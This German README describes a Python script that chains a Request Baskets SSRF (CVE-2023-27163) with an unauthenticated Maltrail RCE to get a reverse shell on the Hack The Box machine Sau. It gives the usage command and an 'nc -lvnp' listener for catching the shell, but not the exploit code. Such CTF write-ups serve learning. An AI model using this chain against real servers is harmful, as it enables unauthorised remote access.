
Automatisierte Exploit-Kette für HTB Sau — CVE-2023-27163 (SSRF) + Maltrail nicht authentifizierte RCE → Reverse-Shell
Ein Python-Exploit-Skript, das CVE-2023-27163 (Server-Side Request Forgery in Request Baskets ≤ 1.2.1) mit einer nicht authentifizierten Remote-Code-Execution-Schwachstelle in Maltrail 0.53 verknüpft und eine Reverse Shell liefert. Entwickelt für die Hack-The-Box-Maschine Sau.
Dieses Skript automatisiert den Exploit-Ablauf, der erforderlich ist, um ersten Zugriff auf das Ziel zu erlangen:
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
Beispiel:
python3 exploit.py http://10.10.11.224 10.10.14.6 4444
Starte vor der Ausführung des Exploits einen Listener auf deiner Maschine, um die Reverse Shell einzufangen:
nc -lvnp <LISTENER_PORT>
Beispiel:
nc -lvnp 4444
| Parameter | Beschreibung |
|---|---|
TARGET_URL | Basis-URL des Ziels (z. B. http://IP) |
LISTENER_IP | IP deiner Angreifer-Maschine |
LISTENER_PORT | Port zum Empfangen der Reverse Shell |
bucket_url)/ aus der Ziel-URL (wird im Skript automatisch behandelt)Dieses Projekt ist für Bildungszwecke und die Verwendung in autorisierten Umgebungen wie Hack The Box gedacht. Verwende es nicht gegen Systeme ohne entsprechende Genehmigung.